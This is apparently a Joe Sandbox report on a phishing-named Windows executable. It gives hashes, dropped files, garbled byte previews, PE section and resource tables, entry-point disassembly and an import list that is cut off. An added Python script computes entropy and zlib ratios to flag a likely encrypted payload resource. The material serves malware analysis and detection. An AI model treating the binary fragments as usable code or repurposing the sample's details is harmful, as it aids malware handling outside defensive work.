                  SHA1:FC049C6F2B1D2BE76D7DC1BA79BAE9800C647145
                  SHA-256:9929D074C5FD1959151C22D3575B398805D52E1922DAEECFABCE860F9DFC1DC2
                  SHA-512:A80601EBE5E8C80B50A2944BF45D842282E8186BA23CBD68ABBA09CFB9B61F18FD51A3DDDD2075F706DEE4695D1B4C5D4006049FA1ED32F43852696C523AB42B
                  Malicious:true
                  Antivirus:
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  Reputation:low
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:................0......f......2.... ........@.. .......................`............@....................................O........d...................@..........p............................................ ............... ..H............text...8.... ...................... ..`.rsrc....d.......d..................@..@.reloc.......@......................@..B........................H.......Xk...E......5....................................................0............}.....s....}......}.....(.......(......{.....o.....(C........,b..{....r...po......r...po......{....(J......(....o......{.....o......{....r...po.......}.....8U......}.....{....r)..po......r)..po.....(C.....{.....oX......(....o......{.....oZ...o......{.....o^......(....o......{.....o\......(....o......{.....o`......(....o......{.....ob......(....o......u...........,H..{.....o......{....r...po.
                  Process:C:\Windows\SysWOW64\RMActivate_ssp.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                  Category:dropped
                  Size (bytes):114688
                  Entropy (8bit):0.9746603542602881
                  Encrypted:false
                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                  Malicious:false
                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\SysWOW64\runonce.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                  Category:dropped
                  Size (bytes):114688
                  Entropy (8bit):0.9746603542602881
                  Encrypted:false
                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                  Malicious:false
                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):270848
                  Entropy (8bit):7.993244785648878
                  Encrypted:true
                  SSDEEP:6144:xhlfcgqOqWNrxIpeqFJ+G2nq9K4rq5SF8WEAC3nEAdDgusdrz:xffcYrxIpeqrTY2ti3E08usdrz
                  MD5:ECF90CC94EEEC79DEA97EF11D475013F
                  SHA1:1E1A28C4CA539DAC233CC039CA7757AD22D88801
                  SHA-256:1145CB96A68E5BD2CD09FB2E63BFEDA6F8E07FAF08EAE190376CE838F3E7A7A9
                  SHA-512:A1A899144C1FC0ECCE1FE65CC3ECB0C6C634694D086F3A99E082A7A0F73BF9A4906884A00DF843E5A0EA775CD3D5E46EBEAE2DB47FDA4B8E7264F45F3B195F87
                  Malicious:false
                  Preview:.m.e.BWWS...\....7@..{S;..GVA7S7CBWWSP34UEGVA7S7CBWWSP34.EGVO(.9C.^.r.2x.d.>(DsG1-0%2=.W4+)95.1Rc0"9s9]....v,X7RmOZ]wP34UEGV86Z.~"0.n0T.h% .[...y"0.I...i% .[...."0..9P\h% .A7S7CBWW..34.DFV0Wm`CBWWSP34.EEWJ6X7CRSWSP34UEGV.$S7CRWWSp74UE.VA'S7C@WWUP34UEGVG7S7CBWWSp74UGGVA7S7AB..SP#4UUGVA7C7CRWWSP34EEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVoC6O7BWW._74UUGVA'W7CRWWSP34UEGVA7S7cBW7SP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWW
                  Process:C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):9816
                  Entropy (8bit):7.599592768271719
                  Encrypted:false
                  SSDEEP:192:65jwEiqEH1WgUJuzJkecGgJo7xocBk3mxhGQedF1POj8LktFp1F:I6qEHYV0eecGGo7xocBpcxB81npL
                  MD5:32866B2C1D7E56C9E8ADEF439F4582B8
                  SHA1:EA23006855335659F193A252331E8796C71832F2
                  SHA-256:2639BE9CB75B7272404FC7658CB0EAA6C2DCF75CD09F612F1F344A0F58879BA5
                  SHA-512:890D775B173AAC55877D6C20A6CD907F3285CD0DA686322411E5625AF6A5879733643F59D3D607647A60D7B4A5E5120FDC529174661D3F826D0DDC3F71B128F5
                  Malicious:false
                  Preview:EA06..pT.Q&...8.M.z,.D.Lf....y9......o3.N&T...5...j..m1..f.Y..cD.L'.....3.N(s...m9...s.5..8.L/.Y...e..&6[...0.L..I..k7.N&. ..a0.M.....q4.Nf.P.....K..d.%...p.lY@.......c.Xf.0.o..b.L.`...,@. ...3+..d....s4.l&..........|....sa...`.........Y&.K0.....-vs5.M..2...N&.I...@.>..........$.0...fx. ..$l...I...#..$6...... ..... .Z...a.5..&.).....L.j.;$....M.j.;$....X@j.;%....Y@j.;,.....j.e.|f #^...j......l.....l.5....>0..Xf....M.^....$zn.....G..I....C...M.|........}S{....7...| l..P..........0...`>;..c7.6..{......=..7..............6,......b...,S ...i5.M.4.b..i|v)....b.h.,@..%........9....c...|3Y..h......._......@.>K...,v[..q5.M,.@..i7.X......9....2.......,.`....3.,.i8........}.k(.f..@..M&V....7.,.x....&.......0.......Fh...Fb.....3.."a9...`....,vb.....cd.X..P.Fl.Y.$..c. ....I...d..f.!...,vd......8..P.......0.....2...y...D.......c.0.......b.<NA...NM..;4.X.q1..&@Q..B.Y.ah......Yl.i..."..Bvj.........ic..'3Y..'f.....,j.1........C.`....7b.., .p..T.......Y,Vi......@
                  Process:C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):270848
                  Entropy (8bit):7.993244785648878
                  Encrypted:true
                  SSDEEP:6144:xhlfcgqOqWNrxIpeqFJ+G2nq9K4rq5SF8WEAC3nEAdDgusdrz:xffcYrxIpeqrTY2ti3E08usdrz
                  MD5:ECF90CC94EEEC79DEA97EF11D475013F
                  SHA1:1E1A28C4CA539DAC233CC039CA7757AD22D88801
                  SHA-256:1145CB96A68E5BD2CD09FB2E63BFEDA6F8E07FAF08EAE190376CE838F3E7A7A9
                  SHA-512:A1A899144C1FC0ECCE1FE65CC3ECB0C6C634694D086F3A99E082A7A0F73BF9A4906884A00DF843E5A0EA775CD3D5E46EBEAE2DB47FDA4B8E7264F45F3B195F87
                  Malicious:false
                  Preview:.m.e.BWWS...\....7@..{S;..GVA7S7CBWWSP34UEGVA7S7CBWWSP34.EGVO(.9C.^.r.2x.d.>(DsG1-0%2=.W4+)95.1Rc0"9s9]....v,X7RmOZ]wP34UEGV86Z.~"0.n0T.h% .[...y"0.I...i% .[...."0..9P\h% .A7S7CBWW..34.DFV0Wm`CBWWSP34.EEWJ6X7CRSWSP34UEGV.$S7CRWWSp74UE.VA'S7C@WWUP34UEGVG7S7CBWWSp74UGGVA7S7AB..SP#4UUGVA7C7CRWWSP34EEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVoC6O7BWW._74UUGVA'W7CRWWSP34UEGVA7S7cBW7SP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWW
                  Process:C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe
                  File Type:ASCII text, with very long lines (28756), with no line terminators
                  Category:dropped
                  Size (bytes):28756
                  Entropy (8bit):3.5869856049536324
                  Encrypted:false
                  SSDEEP:768:miTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbd+IH6B34vfF3if6gyCQ:miTZ+2QoioGRk6ZklputwjpjBkCiw2RH
                  MD5:CA3BDAD4122F198343018E0F5960CF4B
                  SHA1:ABB213CE0969ECD783185DB7A916403292B5E02A
                  SHA-256:B955D493759D01AEBB11CFD04A8941849C1A716214CD6BB59405C183E6C21E0B
                  SHA-512:E85D738A74EE8C42377B4E31744F06D623D88DBCF03508587B2D42D469A8B5721AB2697407FD6C423F8D62C4AB08C5C62051D4EBA9192CD7C7DBAFAF6EC3BD41
                  Malicious:false
                  Preview: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
                  Process:C:\Windows\SysWOW64\RMActivate_ssp.exe
                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):984064
                  Entropy (8bit):7.950714934497661
                  Encrypted:false
                  SSDEEP:24576:fU8Gw/b1JQTj374gt7R7J9xCL8+cnVOdsMrxtY:fTGGJQTj374WdJ9xCL8+cVyrvY
                  MD5:C2F2B08E34FC25D172F2C3FCAB1ACFEB
                  SHA1:FC049C6F2B1D2BE76D7DC1BA79BAE9800C647145
                  SHA-256:9929D074C5FD1959151C22D3575B398805D52E1922DAEECFABCE860F9DFC1DC2
                  SHA-512:A80601EBE5E8C80B50A2944BF45D842282E8186BA23CBD68ABBA09CFB9B61F18FD51A3DDDD2075F706DEE4695D1B4C5D4006049FA1ED32F43852696C523AB42B
                  Malicious:true
                  Antivirus:
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:................0......f......2.... ........@.. .......................`............@....................................O........d...................@..........p............................................ ............... ..H............text...8.... ...................... ..`.rsrc....d.......d..................@..@.reloc.......@......................@..B........................H.......Xk...E......5....................................................0............}.....s....}......}.....(.......(......{.....o.....(C........,b..{....r...po......r...po......{....(J......(....o......{.....o......{....r...po.......}.....8U......}.....{....r)..po......r)..po.....(C.....{.....oX......(....o......{.....oZ...o......{.....o^......(....o......{.....o\......(....o......{.....o`......(....o......{.....ob......(....o......u...........,H..{.....o......{....r...po.
                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):7.122981106826642
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:RFQ - MK FMHS.RFQ.24.101.exe
                  File size:1'173'504 bytes
                  MD5:c8fe2e7043d030cf93cdab759d44f5e4
                  SHA1:fb166f49af2527ca5b90fa2538c2520727687331
                  SHA256:f78ebb5c21f07a42ed4351b7b8639d780f9d99a9afbb749daeaab9af97511acd
                  SHA512:e4220efb5f813dbaaa260b0eafcd8da984fa5a5afa19d73e2ee82dfc166e1be731de163c6ae6bd1a510db672fe51d5289bcbc841812774de1ff29638b77bb75b
                  SSDEEP:24576:ZAHnh+eWsN3skA4RV1Hom2KXMmHakd9o4h8wXiuSWAcnOJZ5:gh+ZkldoPK8Yakd9o49iq1Oh
                  TLSH:6745AD0273D2C036FFAB92739B6AB6059ABC79254133852F13981DB9BD701B1163E763
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..
                  Icon Hash:aaf3e3e3938382a0
                  Entrypoint:0x42800a
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                  Time Stamp:0x6685E41D [Wed Jul 3 23:51:57 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:1
                  File Version Major:5
                  File Version Minor:1
                  Subsystem Version Major:5
                  Subsystem Version Minor:1
                  Import Hash:afcdf79be1557326c854b6e20cb900a7
                  Instruction
                  call 00007FCF4C893F0Dh
                  jmp 00007FCF4C886CC4h
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  push edi
                  push esi
                  mov esi, dword ptr [esp+10h]
                  mov ecx, dword ptr [esp+14h]
                  mov edi, dword ptr [esp+0Ch]
                  mov eax, ecx
                  mov edx, ecx
                  add eax, esi
                  cmp edi, esi
                  jbe 00007FCF4C886E4Ah
                  cmp edi, eax
                  jc 00007FCF4C8871AEh
                  bt dword ptr [004C41FCh], 01h
                  jnc 00007FCF4C886E49h
                  rep movsb
                  jmp 00007FCF4C88715Ch
                  cmp ecx, 00000080h
                  jc 00007FCF4C887014h
                  mov eax, edi
                  xor eax, esi
                  test eax, 0000000Fh
                  jne 00007FCF4C886E50h
                  bt dword ptr [004BF324h], 01h
                  jc 00007FCF4C887320h
                  bt dword ptr [004C41FCh], 00000000h
                  jnc 00007FCF4C886FEDh
                  test edi, 00000003h
                  jne 00007FCF4C886FFEh
                  test esi, 00000003h
                  jne 00007FCF4C886FDDh
                  bt edi, 02h
                  jnc 00007FCF4C886E4Fh
                  mov eax, dword ptr [esi]
                  sub ecx, 04h
                  lea esi, dword ptr [esi+04h]
                  mov dword ptr [edi], eax
                  lea edi, dword ptr [edi+04h]
                  bt edi, 03h
                  jnc 00007FCF4C886E53h
                  movq xmm1, qword ptr [esi]
                  sub ecx, 08h
                  lea esi, dword ptr [esi+08h]
                  movq qword ptr [edi], xmm1
                  lea edi, dword ptr [edi+08h]
                  test esi, 00000007h
                  je 00007FCF4C886EA5h
                  bt esi, 03h
                  Programming Language:
                  • [ASM] VS2013 build 21005
                  • [ C ] VS2013 build 21005
                  • [C++] VS2013 build 21005
                  • [ C ] VS2008 SP1 build 30729
                  • [IMP] VS2008 SP1 build 30729
                  • [ASM] VS2013 UPD5 build 40629
                  • [RES] VS2013 build 21005
                  • [LNK] VS2013 UPD5 build 40629
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xbc0cc | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc8000 | 0x54174 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x11d000 | 0x7134 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4b50 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dfdd | 0x8e000 | 310e36668512d53489c005622bb1b4a9 | False | 0.5735602580325704 | data | 6.675248351711057 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2fd8e | 0x2fe00 | 748cf1ab2605ce1fd72d53d912abb68f | False | 0.32828818537859006 | data | 5.763244005758284 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbf000 | 0x8f74 | 0x5200 | aae9601d920f07080bdfadf43dfeff12 | False | 0.1017530487804878 | data | 1.1963819235530628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc8000 | 0x54174 | 0x54200 | f5f0aae17c8e70c7089288959b76635b | False | 0.9220549312778603 | data | 7.881021773489041 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x11d000 | 0x7134 | 0x7200 | f04128ad0f87f42830e4a6cdbc38c719 | False | 0.7617530153508771 | data | 6.783955557128661 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0xc85a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216 |
| RT_ICON | 0xc86d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027 |
| RT_ICON | 0xc87f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135 |
| RT_ICON | 0xc8920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333 |
| RT_ICON | 0xc8c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5 |
| RT_ICON | 0xc8d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388 |
| RT_ICON | 0xc9bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524 |
| RT_ICON | 0xca480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918 |
| RT_ICON | 0xca9e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727 |
| RT_ICON | 0xccf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496 |
| RT_ICON | 0xce038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227 |
| RT_MENU | 0xce4a0 | 0x50 | data | English | Great Britain | 0.9 |
| RT_STRING | 0xce4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333 |
| RT_STRING | 0xcea84 | 0x68a | data | English | Great Britain | 0.2747909199522103 |
| RT_STRING | 0xcf110 | 0x490 | data | English | Great Britain | 0.3715753424657534 |
| RT_STRING | 0xcf5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282 |
| RT_STRING | 0xcfb9c | 0x65c | data | English | Great Britain | 0.34336609336609336 |
| RT_STRING | 0xd01f8 | 0x466 | data | English | Great Britain | 0.3605683836589698 |
| RT_STRING | 0xd0660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186 |
| RT_RCDATA | 0xd07b8 | 0x4b43a | data | | | 1.000327622112222 |
| RT_GROUP_ICON | 0x11bbf4 | 0x76 | data | English | Great Britain | 0.6610169491525424 |
| RT_GROUP_ICON | 0x11bc6c | 0x14 | data | English | Great Britain | 1.25 |
| RT_GROUP_ICON | 0x11bc80 | 0x14 | data | English | Great Britain | 1.15 |
| RT_GROUP_ICON | 0x11bc94 | 0x14 | data | English | Great Britain | 1.25 |
| RT_VERSION | 0x11bca8 | 0xdc | data | English | Great Britain | 0.6181818181818182 |
| RT_MANIFEST | 0x11bd84 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823 |
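The Entropy and ZLIB Complexity columns are what make the .rsrc section (entropy 7.88 out of a possible 8.0) and the 0x4b43a-byte RT_RCDATA entry (complexity 1.0003, i.e. the data grew when zlib tried to compress it) stand out against the icons, strings and manifest around them; together with the "compiled AutoIt script" verdict, that resource is the one a practitioner would carve out first. The Python below is an added example, not part of the Joe Sandbox report, that shows how the two metrics are computed and how to use them to pick out the likely payload carrier. It assumes ZLIB complexity means compressed length divided by raw length (my reading of the column, not a documented definition), the triage thresholds are my own working values, and the input blobs are constructed: a plain-text buffer and a seeded pseudo-random buffer the size of the RT_RCDATA entry standing in for an encrypted payload.

```python
import math
import random
import zlib
from dataclasses import dataclass


@dataclass
class BlobStats:
    size: int
    entropy: float          # Shannon entropy in bits per byte (0.0 .. 8.0)
    zlib_complexity: float  # len(zlib-compressed) / len(raw); >= 1.0 means incompressible


def shannon_entropy(data: bytes) -> float:
    """Byte-level Shannon entropy; 8.0 is the ceiling (uniform byte distribution)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def zlib_complexity(data: bytes) -> float:
    """Compression ratio in the sense assumed for the ZLIB Complexity column:
    compressed length divided by raw length (zlib level 9)."""
    if not data:
        return 0.0
    return len(zlib.compress(data, 9)) / len(data)


def blob_stats(data: bytes) -> BlobStats:
    return BlobStats(len(data), shannon_entropy(data), zlib_complexity(data))


def classify(stats: BlobStats, entropy_floor: float = 7.2,
             complexity_floor: float = 0.95) -> str:
    """Triage verdict for one blob. Thresholds are working values of my own,
    not Joe Sandbox's."""
    if stats.size < 64:
        # Tiny blobs (the 0x14-byte RT_GROUP_ICON entries above) compress badly
        # whatever they contain, so their ratio says nothing about packing.
        return "too-small"
    if stats.entropy >= entropy_floor and stats.zlib_complexity >= complexity_floor:
        return "packed-or-encrypted"
    if stats.entropy >= entropy_floor:
        return "high-entropy"
    return "plain"


def likely_payload_resources(rows, min_size=16 * 1024, complexity_floor=0.95):
    """From (name, rva, size, complexity) rows keep the large, incompressible ones:
    those are the candidates for an embedded compressed or encrypted payload."""
    return [r for r in rows if r[2] >= min_size and r[3] >= complexity_floor]


# Constructed inputs (not taken from the sample): a repetitive plain-text buffer and a
# seeded pseudo-random buffer of 0x4b43a bytes, the size of the RT_RCDATA entry.
PLAIN_TEXT = b"RFQ - MK FMHS.RFQ.24.101 " * 2048
RANDOM_BLOB = random.Random(20240704).randbytes(0x4B43A)

# A few resource rows transcribed from the table above: (name, RVA, size, ZLIB complexity).
RESOURCE_ROWS = [
    ("RT_ICON",       0xCA9E8,  0x25A8,  0.13858921161825727),
    ("RT_STRING",     0xCE4F0,  0x594,   0.3333333333333333),
    ("RT_RCDATA",     0xD07B8,  0x4B43A, 1.000327622112222),
    ("RT_GROUP_ICON", 0x11BC6C, 0x14,    1.25),
    ("RT_MANIFEST",   0x11BD84, 0x3EF,   0.5074478649453823),
]

if __name__ == "__main__":
    for label, blob in (("plain", PLAIN_TEXT), ("random", RANDOM_BLOB)):
        s = blob_stats(blob)
        print(f"{label:7} size={s.size:7} H={s.entropy:.3f} "
              f"zlib={s.zlib_complexity:.4f} -> {classify(s)}")
    for name, rva, size, cx in likely_payload_resources(RESOURCE_ROWS):
        print(f"payload candidate: {name} rva=0x{rva:x} size=0x{size:x} zlib={cx:.4f}")
```

Read the two numbers together: high entropy alone also describes compressed icons and legitimate packed code, but a blob that is both near 8 bits per byte and will not shrink under zlib is either already compressed or encrypted, which for a sample flagged as a compiled AutoIt script points at the wrapped payload rather than at interpreter code.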
| DLL | Import |
|---|---|
| WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect |
| VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW |
| WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW |
| COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create |
| MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W |
| WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW |
| PSAPI.DLL | GetProcessMemoryInfo |
| IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho |
| USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW |
| UxTheme.dll | IsThemeActive |
| KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, 